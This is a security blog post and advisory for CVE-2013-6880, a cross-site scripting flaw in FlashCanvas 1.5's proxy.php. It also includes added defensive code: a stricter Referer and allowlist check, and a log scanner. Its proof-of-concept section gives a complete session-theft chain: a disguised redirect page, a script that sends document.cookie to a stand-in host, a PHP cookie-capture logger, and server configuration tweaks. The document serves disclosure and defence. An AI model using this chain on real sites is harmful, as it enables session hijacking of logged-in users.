CVE-2013-6880 Proof of Concept

Marc Wickenden recently discovered a security issue in FlashCanvas 1.5 that could lead to a number of problems, such as cross-site scripting. The issue has been assigned CVE-2013-6880 and the vendor has now released a fix, which can be found here. In this blog post we take a closer look at the issue and at the proof of concept that shows how it can be used to steal session tokens.


Vulnerable code

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Within the proxy.php file the offending code is:

if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {
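The check above only tests how the Referer string ends: any host that can serve a page whose path ends in /flashcanvas.swf passes it, and proxy.php then fetches whatever the url parameter names. The following is an added example of a stricter check, written for this post and not taken from FlashCanvas or from the vendor's 1.6 fix. It requires the Referer's host to be one of the site's own hosts and restricts the url parameter to an allowlist of hosts, so that a spoofed Referer alone is no longer enough. The host names, the two constants and the two function names are assumptions for illustration.

```php
<?php
// Added example (not FlashCanvas code): a stricter front-end check for a proxy
// script such as proxy.php. The original test only looks at how the Referer
// string ends, so any host serving a path ending in /flashcanvas.swf passes.
// Here the Referer's host must be one of our own hosts, and the url= target
// must be on an allowlisted host. Host names below are assumptions.

const TRUSTED_REFERER_HOSTS = ['www.target.com'];   // hosts allowed to embed the SWF (assumed)
const ALLOWED_PROXY_HOSTS   = ['cdn.target.com'];   // hosts proxy.php may fetch from (assumed)

/**
 * True only if $referer is an absolute http(s) URL whose host is ours and
 * whose path ends in the FlashCanvas SWF name, as the original check requires.
 */
function referer_is_trusted(?string $referer, array $trusted = TRUSTED_REFERER_HOSTS): bool
{
    if ($referer === null || $referer === '') {
        return false;                      // no Referer: refuse rather than assume
    }
    $parts = parse_url($referer);
    if ($parts === false || !isset($parts['scheme'], $parts['host'], $parts['path'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (!in_array(strtolower($parts['host']), $trusted, true)) {
        return false;                      // the suffix check alone let any host through
    }
    return (bool) preg_match('#/flash\d*canvas\.swf$#', $parts['path']);
}

/**
 * True only if $url is an absolute http(s) URL on an allowlisted host, so the
 * proxy cannot be pointed at arbitrary remote content even with a forged Referer.
 */
function proxy_target_is_allowed(?string $url, array $allowed = ALLOWED_PROXY_HOSTS): bool
{
    if ($url === null || $url === '') {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    return in_array(strtolower($parts['host']), $allowed, true);
}

// Constructed sample inputs mirroring the cases in the write-up: [Referer, url, expected verdict].
$cases = [
    ['http://www.target.com/FlashCanvas/flashcanvas.swf', 'http://cdn.target.com/img.png', true],
    ['http://delivery.com/flashcanvas.swf',               'http://evil.com/xss.html',      false], // foreign Referer
    ['http://www.target.com/FlashCanvas/flashcanvas.swf', 'http://evil.com/xss.html',      false], // off-site target
    [null,                                                'http://cdn.target.com/img.png', false], // no Referer
];

foreach ($cases as [$referer, $url, $expected]) {
    $ok = referer_is_trusted($referer) && proxy_target_is_allowed($url);
    printf("%-55s %-32s => %s\n", var_export($referer, true), $url, $ok ? 'allow' : 'deny');
    assert($ok === $expected);
}
```

Run it with the PHP CLI (PHP 7.1 or later for the nullable parameter types) and each constructed case prints allow or deny. In a real deployment both checks would sit at the top of proxy.php before any curl request is issued, and the allowlist of proxy targets should be as short as the application permits; the Referer check on its own is only a weak second line, since it depends on a header the browser may omit.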


Creating the exploit

To exploit this issue the victim needs to be already logged in to the target site, and the attacker needs control of a website that can serve a page whose path ends in /flashcanvas.swf.

Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. The attacker entices a victim user to click on a malicious link, which makes a request (for example via a redirect) to the vulnerable proxy.php at the target site with the Referer set to a value that passes the check. proxy.php fetches the requested URL and renders it in the context of the target site. Page rewriting, script execution, you name it, all of it becomes possible from this point.


POC

We have generated a POC to prove this, and can use the flaw to steal a victim's session cookies under the following scenario. To exploit this issue the attacker needs control of a website (let's call this delivery.com) that can serve a page whose path ends in /flashcanvas.swf.

We then use the following code to make a call to the vulnerable proxy.php on the remote site (let's call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.

On delivery.com we need the following:

-- flashcanvas.swf
<!DOCTYPE html>
<html>
<head>
  <title>CVE 2013 6880 POC</title>
  <meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html">
</head>
<body>
  <p>Redirecting...</p>
</body>
</html>
--

On the evil.com site, xss.html (the page proxy.php is asked to fetch) contains the following script:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>

The capture.php file on delivery.com records and prints out the information sent to the page (the request is also recorded in the web server's access logs, of course). For completeness, capture.php is:

<?php
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
if (isset($_GET)) {
    fwrite($fh, "== GET ==\n");
    foreach ($_GET as $k => $v) {
        $arr = explode(";", $v);
        foreach ($arr as $vv) {
            $vals = explode("=", $vv);
            print "<p>$vals[0]: $vals[1]</p>";
        }
        fwrite($fh, "$k:$v\n");
    }
}
if (isset($_POST)) {
    fwrite($fh, "== POST ==\n");
    foreach ($_POST as $k => $v) {
        fwrite($fh, "$k:$v\n");
        print "$k: $v\n";
    }
}
fclose($fh);
?>
</body>
</html>


Summary

In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request (in our case via a redirect) to the vulnerable proxy.php at the target site with the Referer set to a value that passes the check. proxy.php fetches the requested URL (http://evil.com/xss.html) and renders it in the context of the target.com site, with script execution and full DOM access.

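From the defending side, the chain above leaves a recognisable trace in the target site's access log: a request for proxy.php whose Referer host is not one of the site's own hosts, or whose url parameter points off-site. The script below is an added example, not part of the original post, that scans Apache combined-format log lines for that pattern. The host names and the log lines are constructed for illustration, and OWN_HOSTS and find_proxy_abuse are names chosen for this example.

```php
<?php
// Added example (not from the original post): scan Apache combined-format
// access log lines for proxy.php requests matching the chain described in
// the write-up. A finding is a proxy.php request whose Referer host is not
// ours, or whose url= parameter points at a host we do not serve.

const OWN_HOSTS = ['www.target.com', 'cdn.target.com'];   // assumption for illustration

// Combined log format: ip ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/';

function host_of(string $url): ?string
{
    $h = parse_url($url, PHP_URL_HOST);
    return is_string($h) ? strtolower($h) : null;
}

/** Returns one finding per suspicious line, with the reason(s) it was flagged. */
function find_proxy_abuse(array $lines, array $own = OWN_HOSTS): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        if (!preg_match(LOG_RE, $line, $m)) {
            continue;                                    // not a combined-format line
        }
        [, $ip, $time, $method, $path, $status, $referer] = $m;
        $pathOnly = parse_url($path, PHP_URL_PATH) ?? '';
        if (!preg_match('#/proxy\.php$#', $pathOnly)) {
            continue;                                    // only the proxy script is of interest
        }
        parse_str((string) parse_url($path, PHP_URL_QUERY), $q);
        $target  = isset($q['url']) ? host_of($q['url']) : null;
        $refHost = $referer === '-' ? null : host_of($referer);

        $reasons = [];
        if ($refHost === null || !in_array($refHost, $own, true)) {
            $reasons[] = "Referer host '" . ($refHost ?? 'none') . "' is not ours";
        }
        if ($target === null || !in_array($target, $own, true)) {
            $reasons[] = "url= points at '" . ($target ?? 'invalid') . "'";
        }
        if ($reasons) {
            $findings[] = ['line' => $n + 1, 'ip' => $ip, 'time' => $time,
                           'status' => $status, 'reason' => implode('; ', $reasons)];
        }
    }
    return $findings;
}

// Constructed sample log lines: one legitimate proxy use, one matching the PoC, one unrelated.
$sample = [
    '10.0.0.5 - - [11/Dec/2013:10:00:01 +0000] "GET /FlashCanvas/proxy.php?url=http://cdn.target.com/a.png HTTP/1.1" 200 512 "http://www.target.com/FlashCanvas/flashcanvas.swf" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2013:10:00:02 +0000] "GET /FlashCanvas/proxy.php?url=http://evil.com/xss.html HTTP/1.1" 200 310 "http://delivery.com/flashcanvas.swf" "Mozilla/5.0"',
    '198.51.100.7 - - [11/Dec/2013:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach (find_proxy_abuse($sample) as $f) {
    printf("line %d %s %s status %s: %s\n", $f['line'], $f['time'], $f['ip'], $f['status'], $f['reason']);
}
```

Only the second constructed line is reported, with both reasons (foreign Referer host and off-site url target). Because the proxied content is fetched server-side, the target site's own log is the one place the off-site url parameter is visible, which is why the check is worth keeping even after upgrading.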

Note

By default, Apache serves the .swf extension as Shockwave Flash (application/x-shockwave-flash). We need it served as an HTML page, which requires the following configuration changes on the web server hosting flashcanvas.swf (delivery.com in the example above):

Comment out the following line on /etc/mime.types:

#application/x-shockwave-flash swf swfl

In your Apache configuration, edit /etc/apache2/mods-enabled/mime.conf and add:

AddType text/html .swf

Don't forget to reload Apache.

CVE-2013-6880 FlashCanvas proxy.php XSS Vulnerability

Advisory Information

Title: FlashCanvas proxy.php XSS Vulnerability

Date published: 11 December 2013

Reference: CVE-2013-6880

Advisory Summary

Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.

Vendor

FlashCanvas.net <http://flashcanvas.net/>

Affected Software

FlashCanvas 1.5 and possibly older.

FlashCanvas is also used in other software frameworks such as WebShims, so the range of affected software may be wider.

Description of Issue

The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one demonstrated being cross-site scripting. More technical detail can be found in the accompanying blog post.

Fix

We would recommend updating to version 1.6.
